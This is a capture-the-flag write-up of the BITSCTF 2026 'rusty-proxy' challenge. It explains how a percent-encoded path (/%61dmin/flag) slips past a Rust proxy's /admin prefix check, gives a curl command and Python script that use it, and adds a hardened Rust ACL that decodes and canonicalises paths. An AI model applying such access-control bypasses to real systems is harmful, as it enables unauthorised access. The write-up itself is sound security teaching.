BITSCTF 2026 - rusty-proxy - Web Exploitation Writeup

Category: Web Exploitation
Flag: BITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}

Challenge Description

Rust reverse proxy with Flask backend. Remote: http://rusty-proxy.chals.bitskrieg.in:25001

Analysis

Proxy ACL in main.rs:

fn is_path_allowed(path: &str) -> bool {
    let normalized = path.to_lowercase();
    if normalized.starts_with("/admin") {
        return false;
    }
    true
}

The proxy checks the raw request path without URL decoding, so a percent-encoded path never matches the /admin prefix. Flask percent-decodes the path before routing, so %61 becomes a.

Exploitation

curl "http://rusty-proxy.chals.bitskrieg.in:25001/%61dmin/flag"

/%61dmin/flag passes proxy check (doesn’t start with /admin), but Flask receives /admin/flag.

Or using Python:

#!/usr/bin/env python3
import requests

URL = "http://rusty-proxy.chals.bitskrieg.in:25001/%61dmin/flag"

r = requests.get(URL, timeout=10)
data = r.json()
print(f"Flag: {data.get('flag')}")
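The fix on the proxy side is to compare the path in the form the backend will actually see it. The following is an added example, not the challenge's code: a hardened is_path_allowed that percent-decodes, resolves dot segments and repeated slashes, lowercases, and only then applies the same /admin prefix rule. It assumes the path is passed without a query string and that the backend decodes exactly once, as Flask/Werkzeug does; percent_decode, canonicalize and is_path_allowed_fixed are hypothetical names.

```rust
// Added example: a hardened proxy ACL that canonicalises the path the
// way the backend will see it before applying the deny rule.

/// Percent-decode a path once. Invalid or truncated escapes yield `None`
/// so the caller can fail closed instead of forwarding something the
/// proxy could not interpret.
fn percent_decode(path: &str) -> Option<String> {
    let bytes = path.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        if bytes[i] == b'%' {
            let hex = bytes.get(i + 1..i + 3)?;
            let s = std::str::from_utf8(hex).ok()?;
            out.push(u8::from_str_radix(s, 16).ok()?);
            i += 3;
        } else {
            out.push(bytes[i]);
            i += 1;
        }
    }
    String::from_utf8(out).ok()
}

/// Resolve `.`/`..` segments and collapse repeated slashes so that
/// `/x/../admin` and `//admin` are compared in canonical form.
fn canonicalize(path: &str) -> String {
    let mut segs: Vec<&str> = Vec::new();
    for seg in path.split('/') {
        match seg {
            "" | "." => continue,
            ".." => { segs.pop(); }
            s => segs.push(s),
        }
    }
    format!("/{}", segs.join("/"))
}

/// Hardened ACL: decode, canonicalise, lowercase, then apply the same
/// `/admin` prefix rule as the original check (assumed backend decodes once).
fn is_path_allowed_fixed(path: &str) -> bool {
    let decoded = match percent_decode(path) {
        Some(d) => d,
        None => return false, // malformed escape: fail closed
    };
    let canon = canonicalize(&decoded).to_lowercase();
    !canon.starts_with("/admin")
}
```

Because the check runs on the decoded, canonical path, /%61dmin/flag, /public/../admin/flag and //admin/flag are all denied, while a malformed escape is rejected rather than forwarded.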
https://blog.rei.my.id/posts/49/bitsctf-2026-rusty-proxy-web-exploitation-writeup/
Author: Reidho Satria
Published at: 2026-02-22
License: CC BY-NC-SA 4.0